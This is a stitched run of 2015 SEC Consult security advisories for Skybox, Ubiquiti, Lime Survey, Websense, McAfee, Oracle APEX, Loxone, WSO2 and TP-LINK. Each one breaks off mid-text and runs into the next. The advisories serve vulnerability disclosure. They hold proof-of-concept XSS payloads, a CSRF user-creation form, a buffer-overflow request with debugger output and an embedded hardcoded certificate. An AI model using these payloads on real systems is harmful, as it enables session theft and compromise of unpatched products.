by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
- ---
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."
Source: http://www.skyboxsecurity.com/
Business recommendation:
-
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for
unauthenticated attackers to download arbitrary files and execute arbitrary
code.
SEC Consult recommends the vendor to conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
available vulnerabilities in the Skybox platform and increase the security
of its customers.
Vulnerability overview/description:
- ---
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution
Proof of concept:
- -
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the
service VersionRepositoryWebService:
POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863
http://schemas.xmlsoap.org/soap/envelope/;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance;>http://schemas.xmlsoap.org/soap/encoding/;
xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85
t;a
xmlns:a=http://www.w3.org/1999/xhtmla:body
onload=alert(1)//a9884933253b">http://schemas.xmlsoap.org/soap/encoding/;>Applicationhttp://schemas.xmlsoap.org/soap/encoding/;>windows-64http://schemas.xmlsoap.org/soap/encoding/;>7.0.601
Other scripts and parameters, such as the parameter status of the login script
(located at https://localhost:444/login.html) are affected as well. The
following request demonstrates this issue:
https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc
ument.cookie%29%3C/script%3E
2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example when creating a new ticket, the title can be misused
to insert JavaScript code. The following request to the server demonstrates
the issue:
Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]
7|0|18|https://localhost:8443/skyboxview/webskybox/|2725E|com.skybox.view.g
wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans
fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer
.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas
es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.
netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi
ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.
TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem
Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8
52682809||skyboxview|test">|java.util.ArrayList/41
Other fields, like "Comments" and "Description", are affected as well.
3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows to upload and download attachments for tickets.
The download functionality can be exploited to download arbitrary files. No
authentication is required to exploit this vulnerability.
SEC Consult SA-20151105-0 :: Insecure default configuration in Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20151105-0 >
===
title: Insecure default configuration
product: various Ubiquiti Networks products
vulnerable version: see Vulnerable / tested versions
fixed version: none available
impact: High
homepage: https://www.ubnt.com/
found: 2015-08-17
by: Stefan Viehböck (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
Ubiquiti Networks develops high-performance networking
technology for service providers and enterprises. Our technology
platforms focus on delivering highly advanced and easily deployable
solutions that appeal to a global customer base in underserved and
underpenetrated markets.
Source: http://ir.ubnt.com/
Vulnerability overview/description:
---
1) Hardcoded cryptographic keys
A certificate including its private key is embedded in the firmware of several
Ubiquiti Networks products. The certificate is used for HTTPS (default server
certificate for web based management).
Impersonation, man-in-the-middle or passive decryption attacks are possible.
These attacks allow an attacker to gain access to sensitive information like
admin credentials and use them in further attacks.
Furthermore searching for the certificate fingerprint in data from internet-wide
scans is a low-cost way of finding the IPs of specific products/product groups
and
allows an attacker to exploit vulnerabilities at scale.
2) Remote management enabled by default
The remote management interface is enabled by default. This allows attackers
to exploit vulnerabilities in the device firmware as well as weak credentials
set by the user.
Further information can also be found in our blog post:
http://blog.sec-consult.com/2015/11/the-omnipresence-of-ubiquiti-networks.html
Proof of concept:
-
1) Hardcoded cryptographic keys
OpenSSL text output for the certificate:
Certificate:
Data:
Version: 1 (0x0)
Serial Number: 13408895465235657399 (0xba15f761dbb7b2b7)
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc.,
OU=Technical Support, CN=UBNT/emailAddress=supp...@ubnt.com
Validity
Not Before: Jun 2 08:35:02 2011 GMT
Not After : Jan 1 08:35:02 2020 GMT
Subject: C=US, ST=CA, L=San Jose, O=Ubiquiti Networks Inc.,
OU=Technical Support, CN=UBNT/emailAddress=supp...@ubnt.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
00:be:09:9f:14:3a:f7:ee:e5:8a:c9:76:b2:26:17:
00:7b:0c:85:1c:94:8e:bd:7f:f5:a1:a5:6d:0a:2c:
64:cc:7f:78:bc:11:ee:dc:d9:e6:2a:cb:e1:9e:d8:
17:a6:9c:35:aa:da:c5:c1:3a:a5:48:dc:af:bc:99:
37:59:7e:88:3c:2c:d3:bb:e7:60:6d:e3:19:f9:4e:
18:4c:4c:3a:fd:5e:35:6f:a3:50:b9:50:c0:8e:8b:
fa:a0:ee:c4:96:c5:ba:4e:ed:d8:f1:18:05:36:89:
54:c2:dc:27:eb:75:74:1c:be:9a:4c:c8:e5:ce:fe:
47:44:96:a7:af:10:07:eb:15
Exponent: 65537 (0x10001)
Signature Algorithm: sha1WithRSAEncryption
00:5a:31:81:3a:15:6d:30:95:8d:03:91:47:aa:23:e2:b4:c0:
2e:d4:01:cd:d5:21:6b:69:5e:3c:71:27:10:1c:f5:87:d4:28:
19:17:c2:3d:ec:36:fd:ee:93:07:8f:0b:30:65:0e:28:35:6c:
25:9e:d8:24:16:85:65:29:da:47:df:30:09:84:33:2c:b4:b4:
fa:f0:24:40:b9:ee:1e:f0:1c:33:c3:e1:06:70:2e:6b:fe:a0:
d0:aa:81:6f:cf:1b:70:67:43:01:32:a0:da:bc:8c:a8:91:f3:
cb:b1:97:30:04:f2:c6:77:e8:89:97:2c:d3:1f:cf:03:f1:fc:
36:fa
Certificate:
-BEGIN CERTIFICATE-
MIICrTCCAhYCCQC6Ffdh27eytzANBgkqhkiG9w0BAQUFADCBmjELMAkGA1UEBhMCV
VMxCzAJBgNVBAgTAkNBMREwDwYDVQQHEwhTYW4gSm9zZTEfMB0GA1UEChMWVWJpcX
VpdGkgTmV0d29ya3MgSW5jLjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxDTA
LBgNVBAMTBFVCTlQxHzAdBgkqhkiG9w0BCQEWEHN1cHBvcnRAdWJudC5jb20wHhcN
MTEwNjAyMDgzNTAyWhcNMjAwMTAxMDgzNTAyWjCBmjELMAkGA1UEBhMCVVMxCzAJB
gNVBAgTAkNBMREwDwYDVQQHEwhTYW4gSm9zZTEfMB0GA1UEChMWVWJpcXVpdGkgTm
V0d29ya3MgSW5jLjEaMBgGA1UECxMRVGVjaG5pY2FsIFN1cHBvcnQxDTALBgNVBAM
TBFVCTlQxHzAdBgkqhkiG9w0BCQEWEHN1cHBvcnRAdWJudC5jb20wgZ8wDQYJKoZI
hvcNAQEBBQADgY0AMIGJAoGBAL4JnxQ69+7lisl2siYXAHsMhRyUjr1/9aGlbQosZ
Mx/eLwR7tzZ5irL4Z7YF6acNaraxcE6pUjcr7yZN1l+iDws07vnYG3jGflOGExMOv
1eNW+jULlQwI6L+qDuxJbFuk7t2PEYBTaJVMLcJ+t1dBy+mkzI5c7+R0SWp
SEC Consult SA-20151022-0 :: Lime Survey Multiple Critical Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SEC Consult Vulnerability Lab Security Advisory < 20151022-0 >
===
title: Multiple critical vulnerabilities
product: Lime Survey
vulnerable version: 2.05 up to 2.06+ Build 151014
fixed version: 2.06+ Build 151016
CVE number:
impact: critical
homepage: https://www.limesurvey.org/
found: 2015-10-12
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore
Vienna (HQ) - Vilnius - Zurich - Bangkok
https://www.sec-consult.com
===
Vendor description:
- ---
Lime Survey allows users to quickly create intuitive, powerful,
online question-and-answer surveys that can work for tens to thousands
of participants without much effort. The survey software itself is
self-guiding for the respondents who are participating.
Lime Survey has surpassed 1,500,000 downloads and is used by a huge number of
private persons, big companies, academic facilities and governmental
institutions around the world.
URL: https://www.limesurvey.org/en/about-limesurvey/references
Business recommendation:
-
By combining the vulnerabilities documented in this advisory,
unauthenticated remote attackers can completely compromise Lime
Survey application server.
- - Arbitrary local files can be downloaded
- - Entire Lime Survey database can be accessed
- - Arbitrary PHP code can be executed
SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.
Vulnerability overview/description:
- ---
Due to the lack of function level access control many administrative
functions in Lime Survey can be accessed by remote attackers without
prior authentication.
Moreover, the application did not validate some of user input properly.
Unauthenticated attackers can pass specially crafted data to the entry points
result in following vulnerabilities.
1. Unauthenticated local file disclosure
An attacker can craft a malicious PHP serialized string containing a list of
arbitrary files. This list can be sent to the Lime Survey backup feature
for downloading without prior authentication.
Any files accessible with the privileges of the web server user
can be downloaded.
2. Unauthenticated database dump
An attacker can request the database backup feature without authentication.
The whole Lime Survey database can be downloaded including username and
hashed password of the administrator account.
3. Unauthenticated arbitrary remote code execution
An attacker can inject arbitrary PHP code into the application source code
allowing to plant a malicious web backdoor to access underlying web server.
4. Multiple reflective cross-site scripting
The application is prone to multiple reflective cross-site scripting
vulnerabilities.
Proof of concept:
- -
The vendor kindly asked SEC Consult to give people enough time to update
their installations.
Because of the high risk vulnerabilities, the proof of concept
section has been removed from this advisory.
Vulnerable / tested versions:
- -
The vulnerabilities have been tested on 2.06+ Build 150930
At least the following versions have been identified to be vulnerable:
Version 2.05 Build 150413 up to 2.06+ Build 151014
Vendor contact timeline:
-
2015-10-15: Contacting vendor through Lime Survey bug tracking system
2015-10-15: Vendor acknowledges existence of the vulnerabilities
2015-10-15: Urgent workaround is committed to Lime Survey's code repository
2015-10-16: Vendor asks for giving 6 weeks before disclosing the advisory
2015-10-16: Vendor releases Lime Survey 2.06+ Build 151016 with issues fixed
2015-10-22: SEC Consult releases security advisory without PoC
Solution:
- -
Immediately upgrade to Lime Survey 2.06+ Build 151016 or later.
https://www.limesurvey.org/en/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015
Workaround:
- ---
No workaround available.
Advisory URL:
- -
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich
- Bangkok
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of n
SEC Consult SA-20150805-0 :: Websense Content Gateway Stack Buffer Overflow in handle_debug_network
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory 20150805-0 === title: Stack buffer overflow in handle_debug_network product: Websense Triton Content Manager vulnerable version: 8.0.0 build 1165 fixed version: V8.0.0 HF02 CVE number: CVE-2015-5718 impact: high homepage: www.websense.com found: 2015-04-13 by: C. Schwarz (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- Websense Content Gateway (Content Gateway) is a Linux-based, high-performance Web proxy and cache that provides real-time content scanning and Web site classification to protect network computers from malicious Web content while controlling employee access to dynamic, user-generated Web 2.0 content. Web content has evolved from a static information source to a sophisticated platform for 2-way communications, which can be a valuable productivity tool when adequately secured. URL: http://www.websense.com/content/support/library/deployctr/v76/dic_wcg.aspx Business recommendation: - Attackers are able to completely compromise the Websense Content Manager with combined targeted attack vectors. The scope of the test, where the vulnerabilities have been identified, was a very short crash-test of the application. It is assumed that further vulnerabilities exist within this product. Vulnerability overview/description: - --- A stack-based buffer overflow was identified in the Websense Content Manager administrative interface, which allows to write past the 512 bytes sized buffer dest when calling strcpy in handle_debug_network. The vulnerability can be used in combination with a CSRF attack to crash the system or execute arbitrary code. Proof of concept: - - A single HTTP request is sufficient to crash the content_manager binary application: POST /submit_net_debug.cgi?mode=0menu=0item=4tab=1 HTTP/1.1 Host: content gateway:8081 [...] Content-Length: 869 record_version=10479%3A70submit_from_page=%2Fmonitor%2Fm_net_debug.inkcmd_name=1cmd_param=[Ax2048]cmd_status=0troute_install=0tdump_install=0cmd_action=1cate=pingcate=asdapply=apply Below is the GDB output of the process memory, most of the CPU's registers including the stack pointer of various previous frames are overwritten with the value of 'A'. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7f122b073700 (LWP 50174)] 0x006becb1 in handle_debug_network (whc=value optimized out, tag=value optimized out, arg=value optimized out) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997 997 /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc: No such file or directory. in /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc (gdb) i r rax0x0 0 rbx0x4141414141414141 4702111234474983745 rcx0x125c0 75200 rdx0xda3f 55871 rsi0x354136055841632 rdi0x1 1 rbp0x4141414141414141 0x4141414141414141 rsp0x7f122b070618 0x7f122b070618 r8 0x4141414141414141 4702111234474983745 r9 0x4141414141414141 4702111234474983745 r100x4141414141414141 4702111234474983745 r110x3f2c35a350 271324652368 r120x4141414141414141 4702111234474983745 r130x4141414141414141 4702111234474983745 r140x4141414141414141 4702111234474983745 r150x4141414141414141 4702111234474983745 rip0x6becb1 0x6becb1 handle_debug_network(WebHttpContext*, char const*, char*)+561 eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) bt #0 0x006becb1 in handle_debug_network (whc=value optimized out, tag=value optimized out, arg=value optimized out) at /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997 #1 0x4141414141414141 in ?? () #2 0x4141414141414141 in ?? () #3 0x4141414141414141 in ?? () #4 0x4141414141414141 in ?? () #5 0x4141414141414141 in ?? () #6 0x4141414141414141 in ?? () #7 0x4141414141414141 in ?? () #8 0x4141414141414141 in ?? () #9 0x4141414141414141 in ?? () #10 0x4141414141414141
SEC Consult SA-20150728-0 :: McAfee Application Control Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory 20150728-0 === title: McAfee Application Control Multiple Vulnerabilities product: McAfee Application Control vulnerable version: verified in version 6.1.3.353 fixed version: a fixed version is currently not available impact: high homepage: www.mcafee.com/us/products/application-control.aspx found: 28.04.2015 by: R. Freingruber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- McAfee Application Control software provides an effective way to block unauthorized applications and code on servers, corporate desktops, and fixed-function devices. This centrally managed whitelisting solution uses a dynamic trust model and innovative security features that thwart advanced persistent threats — without requiring signature updates or labor-intensive list management. Source: http://www.mcafee.com/us/products/application-control.aspx Business recommendation: - By combining the vulnerabilities documented in this advisory an attacker can completely bypass the mitigations provided by McAfee Application Control. This especially includes the application whitelisting as well as the read and write protections. Moreover, an attacker can attack the availability of the system. SEC Consult recommends not to use this software until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: - --- 1) Injected library bypasses protections of the operating system To add memory corruption protections (mp, mp-casp, mp-vasr, mp-vasr-forced-relocation) McAfee Application Control injects it's own library scinject.dll into all running processes. The library allocates a write- and executable location which can be used to bypass the mitigation technique Data Execution Protection (DEP) of the underlying operating system. Moreover, it can also be used to bypass the mitigation technique mp-casp from McAfee Application Control. This increases the possibility to successfully exploit a memory corruption vulnerability. Since memory corruption vulnerabilities can be used to compromise a system and to bypass the application whitelisting protection it is very important to not decrease the security of protections provided by the operating system. 2) Software shipped with an application from 1999 which includes publicly known vulnerabilities McAfee Application Control installs per default a ZIP application from 1999. The ZIP application contains publicly known vulnerabilities including a buffer overflow. An attacker can exploit the buffer overflow vulnerability to bypass application whitelisting. However, a public exploit is not available and exploitation of the vulnerability is considered not trivial. 3) Multiple kernel driver vulnerabilities An attacker can send manipulated IOCTL requests to the kernel which lead to a system crash. These vulnerabilities can be used to affect the availability of the system. It is expected that these vulnerabilities can also be used to escalate privileges to kernel level. 4) Insufficient application whitelisting protection The main feature of McAfee Application Control is application whitelisting. SEC Consult Vulnerability Lab discovered multiple ways to bypass this protection. 5) Insufficient file system read-/write-protection Because of the design of McAfee Application Control write protection is mandatory to ensure the security of application whitelisting. SEC Consult managed to bypass the write protection to overwrite whitelisted applications to achieve full code execution. Moreover, read protection was bypassed to dump the contents of McAfee's password file. By bypassing write protection it's also possible to delete the password file to interact with McAfee Application Control without requiring a password. This can be used to completely disable McAfee Application Control. Proof of concept: - - Since no fix is available for any of the described vulnerabilities, the proof of concept section was completely removed from the advisory. Vulnerable / tested versions: - - The version 6.1.3.353 was found to be vulnerable. This was the latest version at the time of discovery. Vendor contact timeline: - 2015-06-03: Contacting vendor through security-ale...@mcafee.com
SEC Consult SA-20150716-0 :: Permanent Cross-Site Scripting in Oracle Application Express
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory 20150716-0 === title: Permanent Cross-Site Scripting product: Oracle Application Express vulnerable version: All versions prior to 4.2.3.00.08 fixed version: 4.2.3.00.08 CVE number: CVE-2015-2655 impact: high homepage: https://apex.oracle.com/i/index.html found: 2014-05-28 by: F. Lukavsky SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- Oracle Application Express (Oracle APEX) is Oracle's primary tool for developing Web applications with SQL and PL/SQL. Using only a web browser, you can develop and deploy professional Web-based applications for desktops and mobile devices. It is a fully supported, no cost option of the Oracle Database, and is installed by default in all editions of the Oracle Database. Even those without SQL and PL/SQL knowledge, can still easily install the many built-in packaged applications, such as Survey Builder, Customer Tracker, and P-Track (for tracking projects). http://www.oracle.com/technetwork/developer-tools/apex/overview/index.html Vulnerability overview/description: - --- The gReport Controls Sort Widget is prone to permanent Cross-Site Scripting. The setting display as of the column attributes is ignored for the filter list. Proof of concept: - - Adding the following field to a table will cause an alertbox to display the currently set cookies as soon as the sort options are selected for the column: xss-entryimg src=x onerror=alert(document.cookie) Vulnerable / tested versions: - - All versions prior to 4.2.3.00.08 Vendor contact timeline: - 2014-08-13: Contacting vendor through secalert...@oracle.com 2014-08-14: Vendor response - vulnerbility will be investigated 2014-08-15: Vendor response - issue will be tracked as S0484336 2014-08-22: Status update: Under investigation / Being fixed in main codeline 2014-09-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2014-10-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2014-11-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2014-12-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-01-24: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-02-25: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-03-25: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-04-25: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-05-23: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-06-25: Status update: Issue fixed in main codeline, scheduled for a future CPU 2015-07-11: Issue is fixed in upcoming CPU, patches will be released on 2015-07-14 2015-07-16: Coordinated release of the security advisory Solution: - - Upgrade to Oracle Application Express 4.2.3.00.08. Workaround: - --- Refrain from using the gReport Controls Sort Widget. Advisory URL: - - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~ SEC Consult Vulnerability Lab SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com
SEC Consult SA-20150514-0 :: Multiple vulnerabilities in Loxone Smart Home (part 2)
SEC Consult Vulnerability Lab Security Advisory 20150514-0 === title: Multiple vulnerabilities product: Loxone Smart Home vulnerable version: Firmware version 6.4.5.12 fixed version: 6.4.5.12 impact: Critical homepage: http://www.loxone.com found: 2015-03-12 by: Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor product description: - Loxone Electronics was founded in 2009. Our focus is the development and production of control solutions for all homes. Our aim is to make home automation interesting, affordable and accessible for everyone. URL: http://www.loxone.com/enus/company/about-us.html Business recommendation: Most of the issues previously identified (see SEC Consult security advisory SA-20150227-0) seem not to have been fixed properly and are still exploitable either directly or by easily bypassing implemented measures. A very short crash-test of only a few hours even resulted in new vulnerabilities. The Loxone smart home has multiple design and implementation flaws which combined could be used by an attacker to: 1) remotely cause a denial of service condition which renders the smart home unusable which would effectively disable any Loxone-controlled alarm system, 2) steal the user's credentials for the management interface and fully control the smart home, 3) execute JavaScript code in the user's browser for further attacks, 4) control arbitrary devices connected to the system, e.g. switch on/off lights, remotely open doors or garages, disable alarm system, etc., 5) gain access to admin passwords of Loxone partners (e.g. electricians who are implementing the smart home solution at customers) and completely take over other smart homes of the same Loxone partner! It is recommended by SEC Consult not to use this smart home system until a thorough security analysis (white box) of all components has been performed by security professionals, as a very short crash test (Blackbox) already resulted in critical vulnerabilities. Vulnerability overview/description: --- 1) Cross-site request-forgery (XSRF) The system is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link or by embedding such a link within web pages (e.g. discussion forums) he could control arbitrary functions within the smart home system. All functions can be controlled via web based commands, e.g. in order to switch on lights, remotely open doors or garages, disable the alarm system, etc. This can still be exploited in the current Loxone version and it does not seem to be fixed properly. 2) HTTP Response Splitting / Header injection The web server of the Loxone smart home system is vulnerable to HTTP response splitting attacks. If an attacker is able to lure a user into clicking a crafted link (e.g. just by clicking a URL in a discussion forum or phishing email) he could arbitrarily manipulate the server's response (e.g. injection of JavaScript code). This can still be exploited in the current Loxone version and it does not seem to be fixed properly. The implemented measures/filters can be easily bypassed using double-encoded payloads. This attack is not limited to the admin interface, it can be exploited in any path of the webserver. SEC Consult has verified this attack in the most current versions of Mozilla Firefox and Google Chrome web browsers. 3) Reflected cross-site scripting (XSS) vulnerability The web interface of Loxone smart home is vulnerable to reflected cross-site scripting attacks. If an attacker is able to lure a user into clicking a crafted link (e.g. just by clicking a URL in a discussion forum or phishing email) he could execute arbitrary JavaScript code in the user's browser. Thereby he could steal the user's credentials or control arbitrary devices within the smart home system. To exploit this vulnerability it isn't mandatory for the user to be authenticated. Unauthenticated XSS vulnerabilities exist as well (by exploiting the HTTP Response Splitting vulnerability described in 2) as authenticated ones. SEC Consult has verified this attack in the most current versions of Mozilla Firefox and Google Chrome web browsers. 4) Denial of service An attacker could perform a denial of service attack with simple measures, such as synflood attacks. During such an attack the system isn't accessible via the network and can't be controlled
SEC Consult SA-20150513-0 :: Multiple critical vulnerabilities in WSO2 Identity Server
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory 20150513-0 === title: Multiple critical vulnerabilities product: WSO2 Identity Server other WSO2 Carbon based products may be affected too vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095) fixed version: 5.0.0 with patches 1194 and 1095 applied CVE number: impact: critical homepage: http://wso2.com/products/identity-server/ found: 2015-02-19 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: - --- WSO2 Identity Server provides sophisticated security and identity management of enterprise web applications, services, and APIs, and makes life easier for developers and architects with its hassle-free, minimal monitoring and maintenance requirements. In its latest version, Identity Server acts as an Enterprise Identity Bus (EIB) — a central backbone to connect and manage multiple identities regardless of the standards on which they are based. URL: http://wso2.com/products/identity-server/ Business recommendation: - The WSO2 Identity Server has three security vulnerabilities that allow an attacker to take over administrative user sessions and read arbitrary local files. Moreover, the XXE vulnerability potentially allows an attacker to conduct further attacks on internal servers since the vulnerability may allow an attacker to bypass firewall rules. SEC Consult only conducted a very quick and narrow check on the WSO2 Identity Server. Since in this check a critical vulnerability was found, SEC Consult suspects that the Identity Server contains even more critical vulnerabilities. Since other WSO2 products are based on the same framework (WSO2 Carbon Framework), it is possible that these or similar vulnerabilities affect other products too. SEC Consult recommends to not use any products based on the WSO2 Carbon Framework until a thorough security review has been conducted. Vulnerability overview/description: - --- 1) Reflected cross-site scripting (XSS, IDENTITY-3280) The WSO2 Identity Server is vulnerable to reflected reflected cross-site scripting vulnerabilities. An attacker can lure a victim, that is logged in on the Identity Server administration web interface, to e.g. click on a link and take over the victim's session. 2) Cross-site request forgery (CSRF, IDENTITY-3280) On at least on one web page, CSRF protection has not been implemented. An attacker on the internet could lure a victim, that is logged in on the Identity Server administration web interface, on a web page e.g. containing a manipulated img tag. The attacker is then able to add arbitrary users to the Identity Server. 3) XML external entitiy injection (XXE, IDENTITY-3192) An unauthenticated attacker can use the SAML authentication interface to inject arbitrary external XML entities. This allows an attacker to read arbitrary local files. Moreover, since the XML entity resolver allows remote URLs, this vulnerability may allow to bypass firewall rules and conduct further attacks on internal hosts. Proof of concept: - - 1) Reflected cross-site scripting (XSS, IDENTITY-3280) When opening the following URL an alert-box is shown as an example: http://host:9443/carbon/user/change-passwd.jsp?isUserChange=truereturnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E When a user without permission to create other users issues the following request, an alert-box is shown: - snip POST /carbon/user/add-finish.jsp HTTP/1.1 Host: host:9443 Cookie: cookies Content-Type: application/x-www-form-urlencoded Content-Length: 261 pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24domain=PRIMARYusername=secconsultpasswordMethod=defineHerepassword=test123retype=test123 - snip 2) Cross-site request forgery (CSRF, IDENTITY-3280) The following HTML fragment demonstrates this issue: - snip form method=POST action=https://host:9443/carbon/user/add-finish.jsp input type=text name=domain value=PRIMARY/ input type=text name=username value=secconsult/ input type=text name=password value=test123/ input type=submit/ /form - snip 3) XML external entitiy injection (XXE, IDENTITY-3192) After issuing the following request to a vulnerable Windows server
SEC Consult SA-20150410-0 :: Unauthenticated Local File Disclosure in multiple TP-LINK products (CVE-2015-3035)
SEC Consult Vulnerability Lab Security Advisory 20150410-0 === title: Unauthenticated Local File Disclosure product: Multiple TP-LINK products (see Vulnerable / tested versions) vulnerable version: Multiple (see Vulnerable / tested versions) fixed version: see Solution CVE number: CVE-2015-3035 impact: Critical homepage: http://tp-link.com found: 2015-02-19 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- TP-LINK is a global provider of SOHO SMB networking products and the World's No.1 provider of WLAN products, with products available in over 120 countries to tens of millions customers. Committed to intensive RD, efficient production and strict quality management, TP-LINK continues to provide award-winning networking products in Wireless, ADSL, Routers, Switches, IP Cameras, Powerline Adapters, Print Servers, Media Converters and Network Adapters for Global end-users. Source: http://www.tp-link.us/about/?categoryid=102 Business recommendation: Attackers can read sensitive configuration files without prior authentication. These files e.g. include the administrator credentials and the WPA passphrase. TP-LINK has provided fixed firmware which should be installed 